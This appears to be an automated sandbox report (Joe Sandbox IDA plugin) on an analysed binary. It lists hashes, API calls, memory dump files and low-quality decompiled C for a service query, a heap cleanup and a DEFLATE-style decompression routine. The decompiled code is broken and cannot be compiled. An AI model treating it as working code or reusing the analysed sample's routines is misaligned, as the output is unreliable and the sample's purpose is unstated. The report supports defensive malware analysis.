API ID: Heap$CountFreeProcessTick_snwprintf
String ID:
API String ID: 3064400467-0
Opcode ID: 78de3ec59329d0e871bfe3d0c6a123ddbc17c97e648f391e7bafbf1d17a877f4
Instruction ID: de975a7db117a3bbd262a6c41da5aa06adc70d75b818bd5b00ca27ad40e6b9e8
Opcode Fuzzy Hash: 78de3ec59329d0e871bfe3d0c6a123ddbc17c97e648f391e7bafbf1d17a877f4
Instruction Fuzzy Hash: 54F0A7B1A00500BFE7149760DC8D97B366AEFC5345B144078F50B8B651E9319C56C791

Uniqueness

Uniqueness Score: 4.01%

Function 0011F9BC, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 21
memoryCOMMON

C-Code - Quality: 27%

			E0011F9BC(void* __esi) {
				void* _t2;
				void* _t7;
				void* _t8;
				void* _t10;
				void* _t12;

				asm("popfd");
				asm("int3");
				_t2 = L00111C60(_t7, _t8, __esi);
				_t10 = _t2;
				 *0x125858("536720_3C4E0000", 0x104, _t10, _t12 - 0x14,  *0x126d58);
				return HeapFree(GetProcessHeap(), 0, _t10);
			}

0x0011f9bc
0x0011f9bd
0x0011f9be
0x0011f9c9
0x0011f9da
0x0011f9f7

APIs

_snprintf.NTDLL ref: 0011F9DA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011F9E6
HeapFree.KERNEL32(00000000), ref: 0011F9ED

Strings

536720_3C4E0000, xrefs: 0011F9D5

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$FreeProcess_snprintf
String ID: 536720_3C4E0000
API String ID: 2005195844-3522288767
Opcode ID: 699c6a7d98b5421e3d5ecea71ef14b58b120bd62090be9463376624b9b9d5953
Instruction ID: 22e0223df2061696e30e6bfa6309f3c8cd5f7d289ead294dd9734ba8672359fd
Opcode Fuzzy Hash: 699c6a7d98b5421e3d5ecea71ef14b58b120bd62090be9463376624b9b9d5953
Instruction Fuzzy Hash: CAD0C231580218BBC32067D57C4ABEB3B28DB04327F000041FA49A1991DAB104B087E2

Uniqueness

Uniqueness Score: 16.53%

Function 0011FB0F, Relevance: 6.0, APIs: 4, Instructions: 16memoryserviceCOMMON

APIs

OpenServiceW.ADVAPI32(?,?,00000001), ref: 0011FABF
QueryServiceConfig2W.ADVAPI32 ref: 0011FB0F
GetProcessHeap.KERNEL32(00000000,?), ref: 0011FB1F
HeapFree.KERNEL32(00000000), ref: 0011FB26
CloseServiceHandle.ADVAPI32 ref: 0011FB2D

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Service$Heap$CloseConfig2FreeHandleOpenProcessQuery
String ID:
API String ID: 1527468304-0
Opcode ID: 48e107432893db88463f36ac156b15571bf4d5d866ea454de92ed19cc4737006
Instruction ID: 8f99c6ddeb6feb9eb89ccee48eacfd1d362c6b306ff271daf2556ef35d131062
Opcode Fuzzy Hash: 48e107432893db88463f36ac156b15571bf4d5d866ea454de92ed19cc4737006
Instruction Fuzzy Hash: D1D012B6440A00EBCB1597F49D4C59E7A3AAB4C3123160414E90693611DB3584E25B10

Uniqueness

Uniqueness Score: 0.09%

Function 00115BD5, Relevance: 5.1, APIs: 4, Instructions: 82
COMMON

C-Code - Quality: 68%

			E00115BD5(void* __ebx, void __edi, signed int __esi) {
				signed int _t597;
				signed int _t599;
				void* _t600;
				signed int _t610;
				signed int* _t620;
				signed int _t623;
				signed int _t640;
				signed int _t642;
				signed int _t644;
				signed int _t652;
				signed int _t655;
				signed int _t657;
				signed int _t660;
				signed int _t666;
				signed int _t669;
				signed int _t671;
				void* _t673;
				signed int _t676;
				signed int _t680;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t690;
				unsigned int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t699;
				signed int _t709;
				signed int _t714;
				signed int _t716;
				signed int _t719;
				signed int _t721;
				signed int _t722;
				intOrPtr _t734;
				intOrPtr _t735;
				intOrPtr _t736;
				signed int _t739;
				signed int _t743;
				void* _t749;
				signed int _t754;
				signed int _t756;
				signed int _t760;
				signed int _t764;
				signed int _t767;
				signed int _t771;
				void* _t776;
				signed int _t780;
				void* _t781;
				signed int _t786;
				void* _t787;
				void* _t788;
				signed int _t793;
				signed int _t794;
				void* _t796;
				signed int _t797;
				signed int _t804;
				signed int _t806;
				intOrPtr* _t808;
				void* _t809;
				signed int _t820;
				signed int _t822;
				intOrPtr _t824;
				signed char _t828;
				intOrPtr* _t830;
				void* _t831;
				signed int _t839;
				void* _t841;
				void* _t843;
				signed int _t845;
				intOrPtr _t846;
				signed int _t856;
				signed int _t859;
				void* _t860;
				void* _t861;
				void* _t862;
				void* _t863;
				void* _t864;
				void* _t865;
				void* _t866;
				void* _t867;
				signed char _t868;
				signed char _t871;
				intOrPtr _t873;
				signed int _t876;
				void* _t877;
				signed char _t879;
				signed int _t880;
				signed int _t881;
				signed char _t886;
				signed int _t888;
				void* _t889;
				void* _t890;
				signed int _t893;
				signed char _t894;
				intOrPtr _t896;
				intOrPtr _t898;
				void* _t901;
				signed char _t902;
				signed char _t903;
				void _t904;
				signed int _t908;
				signed char _t913;
				void* _t914;
				void* _t915;
				signed int _t918;
				void* _t923;
				signed int _t927;
				signed char _t931;
				signed int _t932;
				signed char _t935;
				signed int _t936;
				void* _t944;
				signed int _t959;
				unsigned int _t962;
				signed int _t963;
				signed int _t965;
				signed int _t969;
				signed int* _t970;
				signed char* _t975;
				void* _t976;
				void* _t981;
				signed int _t982;
				signed int _t983;
				signed int _t986;
				signed int _t987;
				signed int _t989;
				signed int _t991;
				signed int _t992;
				signed int _t995;
				signed int _t999;
				signed int _t1005;
				signed int _t1006;
				int _t1007;
				int _t1009;
				signed int _t1010;
				unsigned int _t1013;
				void* _t1017;
				intOrPtr _t1018;
				signed char _t1019;
				void _t1022;
				void* _t1024;
				signed int _t1025;
				void* _t1027;
				int _t1032;
				signed int _t1033;
				void* _t1035;
				unsigned int _t1036;
				signed int _t1037;
				void* _t1038;
				void* _t1040;
				signed int _t1042;
				signed int _t1043;
				unsigned int _t1045;
				signed int _t1046;
				unsigned int _t1048;
				signed int _t1049;
				signed char _t1057;
				void* _t1058;
				void* _t1060;
				void* _t1061;

				L0:
				while(1) {
					L0:
					_t1043 = __esi;
					_t1022 = __edi;
					_t841 = __ebx;
					_t596 = memset(__edi + 0x1b80, 0, ??);
					_t962 =  *(_t1058 - 4);
					_t1061 = _t1060 + 0xc;
					while(1) {
						L135:
						 *(_t1058 - 8) = _t893;
						__eflags = _t893 -  *((intOrPtr*)(_t1022 + 0x34));
						if(_t893 >=  *((intOrPtr*)(_t1022 + 0x34))) {
							break;
						}
						L136:
						__eflags = _t1043 - 3;
						if(_t1043 >= 3) {
							L139:
							_t927 = _t991 & 0x00000007;
							_t991 = _t991 >> 3;
							_t1043 = _t1043 - 3;
							 *(_t1058 - 4) = _t991;
							 *(_t1058 - 0x1c) = _t1043;
							_t596 =  *( *(_t1058 - 8) + 0x121a24) & 0x000000ff;
							 *(_t596 + _t1022 + 0x1b80) = _t927;
							_t893 =  *(_t1058 - 8) + 1;
							continue;
						} else {
							while(1) {
								L137:
								__eflags = _t841 -  *(_t1058 - 0x20);
								if(_t841 >=  *(_t1058 - 0x20)) {
									break;
								}
								L138:
								_t596 = ( *_t841 & 0x000000ff) << _t1043;
								_t841 = _t841 + 1;
								_t991 = _t991 | _t596;
								 *(_t1058 - 0x18) = _t841;
								_t1043 = _t1043 + 8;
								 *(_t1058 - 4) = _t991;
								__eflags = _t1043 - 3;
								if(_t1043 < 3) {
									continue;
								} else {
									goto L139;
								}
								goto L295;
							}
							L249:
							 *_t1022 = 0xe;
							L285:
							__eflags =  *(_t1058 + 0x18) & 0x00000002;
							L286:
							L287:
							_t597 =  !=  ? 1 : _t596;
							 *(_t1058 - 0xc) = _t597;
							__eflags = _t597 - 1;
							if(_t597 != 1) {
								L288:
								__eflags = _t597 - 0xfffffffc;
								if(_t597 != 0xfffffffc) {
									L289:
									L292:
									_t642 =  *(_t1058 - 0x3c);
									__eflags = _t841 - _t642;
									if(_t841 > _t642) {
										while(1) {
											L293:
											__eflags = _t1043 - 8;
											if(_t1043 < 8) {
												goto L295;
											}
											L294:
											_t841 = _t841 - 1;
											_t1043 = _t1043 - 8;
											__eflags = _t841 - _t642;
											if(_t841 > _t642) {
												continue;
											}
											goto L295;
										}
									}
								}
							}
						}
						L295:
						_t963 =  *(_t1058 - 4);
						L296:
						 *(_t1022 + 4) = _t1043;
						asm("bts ecx, esi");
						__eflags = _t1043 - 0x20;
						_t599 =  >=  ? 0 : 0;
						_t856 = 0 ^ _t599;
						__eflags = _t1043 - 0x40;
						_t600 =  >=  ? _t856 : _t599;
						 *(_t1022 + 0x20) =  *(_t1058 - 0x28);
						_t965 =  *(_t1058 - 0x10) -  *(_t1058 + 0x10);
						__eflags =  *(_t1058 + 0x18) & 0x00000009;
						 *(_t1022 + 0x24) =  *(_t1058 - 8);
						 *(_t1022 + 0x28) =  *(_t1058 - 0x38);
						 *((intOrPtr*)(_t1022 + 0x3c)) =  *((intOrPtr*)(_t1058 - 0x48));
						 *(_t1022 + 0x38) = _t856 - 0x00000001 & _t963;
						 *(_t1058 - 0x10) = _t965;
						 *((intOrPtr*)( *((intOrPtr*)(_t1058 + 8)))) = _t841 -  *(_t1058 - 0x3c);
						_t843 =  *(_t1058 - 0xc);
						 *( *(_t1058 + 0x14)) = _t965;
						if(( *(_t1058 + 0x18) & 0x00000009) != 0) {
							L297:
							__eflags = _t843;
							if(_t843 >= 0) {
								L298:
								_t1045 =  *(_t1022 + 0x1c);
								_t859 = _t1045 & 0x0000ffff;
								_t610 = (0x5e6ea9af * _t965 >> 0x20 >> 0xb) * 0x15b0;
								_t1046 = _t1045 >> 0x10;
								 *(_t1058 - 0x3c) = _t1046;
								_t969 =  *(_t1058 - 0x10) - _t610;
								__eflags =  *(_t1058 - 0x10);
								 *(_t1058 - 0x34) = _t969;
								if( *(_t1058 - 0x10) != 0) {
									L299:
									_t845 = _t969;
									do {
										L300:
										_t970 = 0;
										 *(_t1058 + 0x14) = 0;
										__eflags = _t845 - 7;
										if(_t845 > 7) {
											L301:
											goto 0x31149d;
											asm("int3");
											asm("int3");
											asm("int3");
											L302:
											_t1024 = _t1022 - _t610;
											__eflags = _t1024;
											do {
												L303:
												_t970 =  &(_t970[2]);
												_t861 = _t859 + ( *_t610 & 0x000000ff);
												_t862 = _t861 + ( *( *(_t1058 + 0x10) + 1) & 0x000000ff);
												_t863 = _t862 + ( *( *(_t1058 + 0x10) + 2) & 0x000000ff);
												_t864 = _t863 + ( *( *(_t1058 + 0x10) + 3) & 0x000000ff);
												_t865 = _t864 + ( *( *(_t1058 + 0x10) + 4) & 0x000000ff);
												_t866 = _t865 + ( *( *(_t1058 + 0x10) + 5) & 0x000000ff);
												_t867 = _t866 + ( *( *(_t1058 + 0x10) + 6) & 0x000000ff);
												_t859 = _t867 + ( *( *(_t1058 + 0x10) + 7) & 0x000000ff);
												_t640 =  *(_t1058 + 0x10) + 8;
												_t1046 = _t1046 + _t861 + _t862 + _t863 + _t864 + _t865 + _t866 + _t867 + _t859;
												 *(_t1058 + 0x10) = _t640;
												__eflags = _t1024 + _t640 - _t845;
												_t610 =  *(_t1058 + 0x10);
											} while (_t1024 + _t640 < _t845);
											 *(_t1058 + 0x14) = _t970;
											 *(_t1058 - 0x3c) = _t1046;
										}
										L305:
										_t1022 = 0;
										 *((intOrPtr*)(_t1058 + 8)) = 0;
										__eflags = _t970 - _t845;
										if(_t970 < _t845) {
											L306:
											__eflags = _t845 - _t970 - 2;
											if(_t845 - _t970 >= 2) {
												L307:
												_t620 =  *(_t1058 + 0x14);
												_t1049 =  *(_t1058 + 0x10);
												_t846 = 0;
												_t981 = (_t845 - _t620 - 2 >> 1) + 1;
												__eflags = _t981;
												 *(_t1058 + 0x14) = _t620 + _t981 * 2;
												do {
													L308:
													_t860 = _t859 + ( *_t1049 & 0x000000ff);
													_t623 =  *(_t1049 + 1) & 0x000000ff;
													_t1022 = _t1022 + _t860;
													_t1049 = _t1049 + 2;
													_t859 = _t860 + _t623;
													_t846 = _t846 + _t859;
													_t981 = _t981 - 1;
													__eflags = _t981;
												} while (_t981 != 0);
												_t970 =  *(_t1058 + 0x14);
												 *(_t1058 + 0x10) = _t1049;
												_t1046 =  *(_t1058 - 0x3c);
												 *((intOrPtr*)(_t1058 + 8)) = _t846;
												_t845 =  *(_t1058 - 0x34);
											}
											L310:
											__eflags = _t970 - _t845;
											if(_t970 < _t845) {
												_t975 =  *(_t1058 + 0x10);
												_t859 = _t859 + ( *_t975 & 0x000000ff);
												_t1046 = _t1046 + _t859;
												_t976 =  &(_t975[1]);
												__eflags = _t976;
												 *(_t1058 + 0x10) = _t976;
											}
											L312:
											_t610 =  *((intOrPtr*)(_t1058 + 8)) + _t1022;
											_t1046 = _t1046 + _t610;
											__eflags = _t1046;
										}
										L313:
										L314:
										_t859 = _t859 + (_t610 * _t859 >> 0x20 >> 0xf) * 0xffff000f;
										_t610 = (0x80078071 * _t1046 >> 0x20 >> 0xf) * 0xffff000f;
										_t1046 = _t1046 + _t610;
										_t586 = _t1058 - 0x10;
										 *_t586 =  *(_t1058 - 0x10) - _t845;
										__eflags =  *_t586;
										_t845 = 0x15b0;
										 *(_t1058 - 0x3c) = _t1046;
										 *(_t1058 - 0x34) = 0x15b0;
									} while ( *_t586 != 0);
									goto 0x3114c6;
									asm("int3");
								}
								L316:
								_t1048 = (_t1046 << 0x10) + _t859;
								 *(_t1022 + 0x1c) = _t1048;
								__eflags = _t843;
								if(_t843 == 0) {
									__eflags =  *(_t1058 + 0x18) & 0x00000001;
									if(( *(_t1058 + 0x18) & 0x00000001) != 0) {
										__eflags = _t1048 -  *(_t1022 + 0x10);
										_t843 =  !=  ? 0xfffffffe : _t843;
									}
								}
							}
						}
						L319:
						return _t843;
						L320:
					}
					L140:
					 *((intOrPtr*)(_t1022 + 0x34)) = 0x13;
					while(1) {
						L141:
						_t694 =  *(_t1022 + 0x18);
						__eflags = _t694;
						if(_t694 >= 0) {
							break;
						}
						L218:
						_t982 =  *(_t1058 - 4);
						while(1) {
							L39:
							_t879 =  *(_t1058 - 0x20) - _t841;
							__eflags = _t879 - 4;
							if(_t879 < 4) {
								goto L58;
							}
							L40:
							_t1022 =  *(_t1058 - 0x14);
							__eflags =  *((intOrPtr*)(_t1058 - 0x40)) -  *(_t1058 - 0x10) - 2;
							if( *((intOrPtr*)(_t1058 - 0x40)) -  *(_t1058 - 0x10) < 2) {
								goto L58;
							} else {
								L41:
								__eflags = _t1043 - 0xf;
								if(_t1043 < 0xf) {
									_t995 =  *(_t841 + 1) & 0x000000ff;
									_t879 = _t1043;
									_t722 =  *_t841 & 0x000000ff;
									_t841 = _t841 + 2;
									 *(_t1058 - 0x18) = _t841;
									 *(_t1058 - 4) =  *(_t1058 - 4) | (_t995 << 0x00000008 | _t722) << _t879;
									_t1043 = _t1043 + 0x10;
									__eflags = _t1043;
									_t982 =  *(_t1058 - 4);
								}
								_t596 =  *((short*)(_t1022 + 0x160 + (_t982 & 0x000003ff) * 2));
								 *(_t1058 - 8) = _t596;
								__eflags = _t596;
								if(_t596 < 0) {
									L45:
									goto 0x311333;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L46:
										_t709 = _t982 >> _t879;
										_t879 = _t879 + 1;
										_t596 = (_t709 & 0x00000001) +  !_t841;
										_t841 =  *((short*)(_t1022 + 0x960 + _t596 * 2));
										__eflags = _t841;
									} while (_t841 < 0);
									 *(_t1058 - 8) = _t841;
									_t841 =  *(_t1058 - 0x18);
								} else {
									L44:
									_t879 = _t596 >> 9;
								}
								L48:
								_t962 = _t982 >> _t879;
								_t1043 = _t1043 - _t879;
								_t880 =  *(_t1058 - 8);
								 *(_t1058 - 4) = _t962;
								__eflags = _t880 & 0x00000100;
								if((_t880 & 0x00000100) != 0) {
									L84:
									_t881 = _t880 & 0x000001ff;
									 *(_t1058 - 8) = _t881;
									__eflags = _t881 - 0x100;
									if(_t881 != 0x100) {
										L219:
										_t673 = _t881 * 4 - 0x404;
										_t868 =  *(_t673 + 0x121010);
										_t596 =  *(_t673 + 0x121a48);
										 *(_t1058 - 0x38) = _t868;
										 *(_t1058 - 8) = _t596;
										__eflags = _t868;
										if(_t868 == 0) {
											L225:
											__eflags = _t1043 - 0xf;
											if(_t1043 >= 0xf) {
												L3:
												_t655 =  *((short*)(_t1022 + 0xf00 + (_t962 & 0x000003ff) * 2));
												 *(_t1058 - 0x1c) = _t655;
												if(_t655 < 0) {
													L5:
													goto 0x3112ba;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L7:
														_t657 = _t962 >> _t868;
														_t868 = _t868 + 1;
														_t841 =  *((short*)(_t1022 + 0x1700 + ((_t657 & 0x00000001) +  !_t841) * 2));
														__eflags = _t841;
													} while (_t841 < 0);
													 *(_t1058 - 0x1c) = _t841;
													_t841 =  *(_t1058 - 0x18);
													_t660 =  *(_t1058 - 0x1c);
												} else {
													L4:
													_t868 = _t655 >> 9;
													_t660 = _t655 & 0x000001ff;
												}
												L9:
												_t982 = _t962 >> _t868;
												_t1043 = _t1043 - _t868;
												_t871 =  *(0x121090 + _t660 * 4);
												_t596 =  *(0x121110 + _t660 * 4);
												 *(_t1058 - 4) = _t982;
												 *(_t1058 - 0x38) = _t871;
												 *(_t1058 - 0x28) = _t596;
												if(_t871 == 0) {
													L15:
													_t873 =  *(_t1058 - 0x10) -  *((intOrPtr*)(_t1058 + 0xc));
													 *((intOrPtr*)(_t1058 - 0x48)) = _t873;
													if(_t596 <= _t873 || ( *(_t1058 + 0x18) & 0x00000004) == 0) {
														L17:
														_t1022 =  *(_t1058 - 0x14);
														_t876 = (_t873 - _t596 &  *(_t1058 - 0x34)) +  *((intOrPtr*)(_t1058 + 0xc));
														 *(_t1058 - 0xc) = _t876;
														_t662 =  >  ?  *(_t1058 - 0x10) : _t876;
														_t877 =  *(_t1058 - 8);
														_t663 = ( >  ?  *(_t1058 - 0x10) : _t876) + _t877;
														_t1075 = ( >  ?  *(_t1058 - 0x10) : _t876) + _t877 -  *((intOrPtr*)(_t1058 - 0x40));
														if(( >  ?  *(_t1058 - 0x10) : _t876) + _t877 <=  *((intOrPtr*)(_t1058 - 0x40))) {
															L21:
															__eflags = _t877 - 9;
															if(_t877 < 9) {
																L30:
																goto 0x3112f7;
																asm("int3");
																do {
																	L32:
																	_t877 = _t877 - 3;
																	 *_t1022 =  *_t982 & 0x000000ff;
																	 *((char*)(_t1022 + 1)) =  *(_t982 + 1) & 0x000000ff;
																	_t666 =  *(_t982 + 2) & 0x000000ff;
																	_t982 = _t982 + 3;
																	 *(_t1022 + 2) = _t666;
																	_t1022 = _t1022 + 3;
																	__eflags = _t877 - 2;
																} while (_t877 > 2);
																goto L33;
															} else {
																L22:
																__eflags = _t877 -  *(_t1058 - 0x28);
																if(_t877 >  *(_t1058 - 0x28)) {
																	goto L30;
																} else {
																	L23:
																	_t1042 =  *(_t1058 - 0xc);
																	_t959 =  *(_t1058 - 0x10);
																	_t828 = (_t877 & 0xfffffff8) + _t1042;
																	 *(_t1058 - 0x24) = _t828;
																	_t1019 = _t828;
																	do {
																		L24:
																		 *_t959 =  *_t1042;
																		_t830 =  *((intOrPtr*)(_t1042 + 4));
																		_t1042 = _t1042 + 8;
																		 *((intOrPtr*)(_t959 + 4)) = _t830;
																		_t959 = _t959 + 8;
																		__eflags = _t1042 - _t1019;
																	} while (_t1042 < _t1019);
																	_t982 =  *(_t1058 - 4);
																	 *(_t1058 - 0x10) = _t959;
																	_t877 =  *(_t1058 - 8) & 0x00000007;
																	 *(_t1058 - 0xc) = _t1042;
																	_t1022 =  *(_t1058 - 0x14);
																	 *(_t1058 - 8) = _t877;
																	__eflags = _t877 - 3;
																	if(_t877 >= 3) {
																		goto L30;
																	} else {
																		goto L26;
																	}
																}
															}
															continue;
														} else {
															while(1) {
																L18:
																_t831 = _t877;
																_t877 = _t877 - 1;
																 *(_t1058 - 8) = _t877;
																if(_t831 == 0) {
																	goto L39;
																}
																L19:
																if( *(_t1058 - 0x10) >=  *((intOrPtr*)(_t1058 - 0x40))) {
																	L238:
																	 *(_t1058 - 0xc) = 2;
																	 *_t1022 = 0x35;
																	goto L292;
																} else {
																	L20:
																	 *(_t1058 - 0x10) =  *(_t1058 - 0x10) + 1;
																	 *((intOrPtr*)(_t1058 - 0x48)) =  *((intOrPtr*)(_t1058 - 0x48)) + 1;
																	 *( *(_t1058 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1058 - 0x48)) -  *(_t1058 - 0x28) &  *(_t1058 - 0x34)) +  *((intOrPtr*)(_t1058 + 0xc))));
																	_t982 =  *(_t1058 - 4);
																	continue;
																}
																goto L295;
															}
															while(1) {
																L39:
																_t879 =  *(_t1058 - 0x20) - _t841;
																__eflags = _t879 - 4;
																if(_t879 < 4) {
																	goto L58;
																}
																goto L40;
															}
															goto L58;
														}
													} else {
														L270:
														_t684 = _t596 | 0xffffffff;
														 *_t1022 = 0x25;
														goto L291;
													}
												} else {
													L10:
													if(_t1043 >= _t871) {
														L13:
														_t1043 = _t1043 - _t871;
														_t839 = (_t596 << _t871) - 0x00000001 & _t982;
														_t982 = _t982 >> _t871;
														 *(_t1058 - 0x28) =  *(_t1058 - 0x28) + _t839;
														_t596 =  *(_t1058 - 0x28);
														 *(_t1058 - 4) = _t982;
														goto L15;
													} else {
														L11:
														while(_t841 <  *(_t1058 - 0x20)) {
															_t596 = ( *_t841 & 0x000000ff) << _t1043;
															_t841 = _t841 + 1;
															_t871 =  *(_t1058 - 0x38);
															_t982 = _t982 | _t596;
															_t1043 = _t1043 + 8;
															 *(_t1058 - 0x18) = _t841;
															 *(_t1058 - 4) = _t982;
															if(_t1043 < _t871) {
																continue;
															} else {
																goto L13;
															}
															goto L295;
														}
														 *_t1022 = 0x1b;
														goto L285;
													}
												}
											} else {
												L226:
												__eflags =  *(_t1058 - 0x20) - _t841 - 2;
												if( *(_t1058 - 0x20) - _t841 >= 2) {
													L237:
													_t983 =  *(_t841 + 1) & 0x000000ff;
													_t676 =  *_t841 & 0x000000ff;
													_t841 = _t841 + 2;
													_t1022 =  *(_t1058 - 0x14);
													_t868 = _t1043;
													 *(_t1058 - 0x18) = _t841;
													 *(_t1058 - 4) =  *(_t1058 - 4) | _t983 << _t1043 + 0x00000008 | _t676 << _t868;
													_t1043 = _t1043 + 0x10;
													_t962 =  *(_t1058 - 4);
												} else {
													do {
														L227:
														_t596 =  *((short*)(_t1022 + 0xf00 + (_t962 & 0x000003ff) * 2));
														 *(_t1058 - 0x24) = _t596;
														__eflags = _t596;
														if(_t596 < 0) {
															L231:
															__eflags = _t1043 - 0xa;
															if(_t1043 <= 0xa) {
																goto L1;
															} else {
																L232:
																L233:
																 *(_t1058 - 0x1c) = _t868;
																while(1) {
																	L234:
																	_t868 =  *((short*)(_t1022 + 0x1700 + ((_t962 >> _t868 & 0x00000001) +  !( *(_t1058 - 0x24))) * 2));
																	_t652 =  *(_t1058 - 0x1c) + 1;
																	 *(_t1058 - 0x24) = _t868;
																	 *(_t1058 - 0x1c) = _t652;
																	__eflags = _t868;
																	if(_t868 >= 0) {
																		goto L3;
																	}
																	L235:
																	_t596 = _t652 + 1;
																	__eflags = _t1043 - _t596;
																	if(_t1043 < _t596) {
																		goto L1;
																	} else {
																		L236:
																		_t868 =  *(_t1058 - 0x1c);
																		continue;
																	}
																	goto L295;
																}
																goto L3;
															}
														} else {
															L228:
															_t596 = _t596 >> 9;
															__eflags = _t596;
															if(_t596 == 0) {
																L1:
																if(_t841 >=  *(_t1058 - 0x20)) {
																	L264:
																	 *_t1022 = 0x1a;
																	goto L285;
																} else {
																	goto L2;
																}
															} else {
																L229:
																__eflags = _t1043 - _t596;
																if(_t1043 >= _t596) {
																	goto L3;
																} else {
																	L230:
																	goto L1;
																}
															}
														}
														goto L295;
														L2:
														_t868 = _t1043;
														_t644 = ( *_t841 & 0x000000ff) << _t868;
														_t841 = _t841 + 1;
														_t962 = _t962 | _t644;
														 *(_t1058 - 0x18) = _t841;
														_t1043 = _t1043 + 8;
														 *(_t1058 - 4) = _t962;
													} while (_t1043 < 0xf);
												}
												goto L3;
											}
										} else {
											L220:
											__eflags = _t1043 - _t868;
											if(_t1043 >= _t868) {
												L223:
												L224:
												_t1043 = _t1043 - _t868;
												_t680 = (_t596 << _t868) - 0x00000001 & _t962;
												_t962 = _t962 >> _t868;
												_t456 = _t1058 - 8;
												 *_t456 =  *(_t1058 - 8) + _t680;
												__eflags =  *_t456;
												 *(_t1058 - 4) = _t962;
												goto L225;
											} else {
												while(1) {
													L221:
													__eflags = _t841 -  *(_t1058 - 0x20);
													if(_t841 >=  *(_t1058 - 0x20)) {
														break;
													}
													L222:
													_t596 = ( *_t841 & 0x000000ff) << _t1043;
													_t841 = _t841 + 1;
													_t868 =  *(_t1058 - 0x38);
													_t962 = _t962 | _t596;
													_t1043 = _t1043 + 8;
													 *(_t1058 - 0x18) = _t841;
													 *(_t1058 - 4) = _t962;
													__eflags = _t1043 - _t868;
													if(_t1043 < _t868) {
														continue;
													} else {
														goto L223;
													}
													goto L295;
												}
												L262:
												 *_t1022 = 0x19;
												goto L285;
											}
										}
									} else {
										while(1) {
											L85:
											__eflags =  *(_t1022 + 0x14) & 0x00000001;
											if(( *(_t1022 + 0x14) & 0x00000001) != 0) {
												break;
											}
											L86:
											__eflags = _t1043 - 3;
											if(_t1043 >= 3) {
												L89:
												_t1043 = _t1043 - 3;
												_t693 = _t962 & 0x00000007;
												_t991 = _t962 >> 3;
												 *(_t1022 + 0x14) = _t693;
												_t596 = _t693 >> 1;
												__eflags = _t596;
												 *(_t1058 - 4) = _t991;
												 *(_t1058 - 0x1c) = _t1043;
												 *(_t1022 + 0x18) = _t596;
												if(_t596 != 0) {
													L124:
													__eflags = _t596 - 3;
													if(_t596 == 3) {
														L266:
														 *(_t1058 - 0xc) = 0xffffffff;
														 *_t1022 = 0xa;
														goto L292;
													} else {
														L125:
														__eflags = _t596 - 1;
														if(_t596 != 1) {
															L128:
															_t893 = 0;
															__eflags = 0;
															while(1) {
																L129:
																 *(_t1058 - 8) = _t893;
																__eflags = _t893 - 3;
																if(_t893 >= 3) {
																	break;
																}
																L130:
																_t596 =  *((char*)(_t893 + 0x121004));
																 *(_t1058 - 0x1c) = _t596;
																__eflags = _t1043 - _t596;
																if(_t1043 >= _t596) {
																	L133:
																	_t1017 = _t1022 + _t893 * 4;
																	_t1036 =  *(_t1058 - 4);
																	 *(_t1017 + 0x2c) = (0x00000001 <<  *(_t1058 - 0x1c)) - 0x00000001 & _t1036;
																	_t804 =  *(_t1058 - 8);
																	_t931 =  *((char*)(_t804 + 0x121004));
																	_t1037 = _t1036 >> _t931;
																	_t1043 = _t1043 - _t931;
																	_t932 = _t804;
																	 *(_t1058 - 4) = _t1037;
																	 *(_t1058 - 0x1c) = _t1043;
																	_t596 =  *(0x121a38 + _t932 * 4);
																	 *(_t1017 + 0x2c) =  *(_t1017 + 0x2c) +  *(0x121a38 + _t932 * 4);
																	_t991 = _t1037;
																	_t1022 =  *(_t1058 - 0x14);
																	_t893 = _t932 + 1;
																	continue;
																} else {
																	while(1) {
																		L131:
																		__eflags = _t841 -  *(_t1058 - 0x20);
																		if(_t841 >=  *(_t1058 - 0x20)) {
																			break;
																		}
																		L132:
																		_t806 = ( *_t841 & 0x000000ff) << _t1043;
																		_t841 = _t841 + 1;
																		_t893 =  *(_t1058 - 8);
																		_t991 = _t991 | _t806;
																		_t1043 = _t1043 + 8;
																		 *(_t1058 - 0x18) = _t841;
																		 *(_t1058 - 4) = _t991;
																		_t596 =  *((char*)(_t893 + 0x121004));
																		 *(_t1058 - 0x1c) = _t596;
																		__eflags = _t1043 - _t596;
																		if(_t1043 < _t596) {
																			continue;
																		} else {
																			goto L133;
																		}
																		goto L295;
																	}
																	L248:
																	 *_t1022 = 0xb;
																	goto L285;
																}
																goto L295;
															}
															L134:
															goto L0;
														} else {
															L126:
															goto 0x3113af;
															asm("int3");
															asm("int3");
															 *((intOrPtr*)(_t596 + 0x2c)) = 0x120;
															L127:
															_t808 = _t596 + 1 - 0x20;
															 *_t808 =  *_t808 + _t808;
															_t841 = _t841 + _t808;
															_t809 = _t808 + 1;
															 *_t809 =  *_t809 ^ _t809;
															 *_t809 = _t809 +  *_t809;
															 *0xde0 =  *0xde0 + _t809;
															memset(_t809, ??, ??);
															asm("movdqa xmm0, [0x121ae0]");
															_t1061 = _t1061 + 0xc;
															asm("movdqu [edi+0x40], xmm0");
															asm("movdqu [edi+0x50], xmm0");
															asm("movdqu [edi+0x60], xmm0");
															asm("movdqu [edi+0x70], xmm0");
															asm("movdqu [edi+0x80], xmm0");
															asm("movdqu [edi+0x90], xmm0");
															asm("movdqu [edi+0xa0], xmm0");
															asm("movdqu [edi+0xb0], xmm0");
															asm("movdqu [edi+0xc0], xmm0");
															_t1038 = _t1022 + 0xd0;
															asm("movdqa xmm0, [0x121af0]");
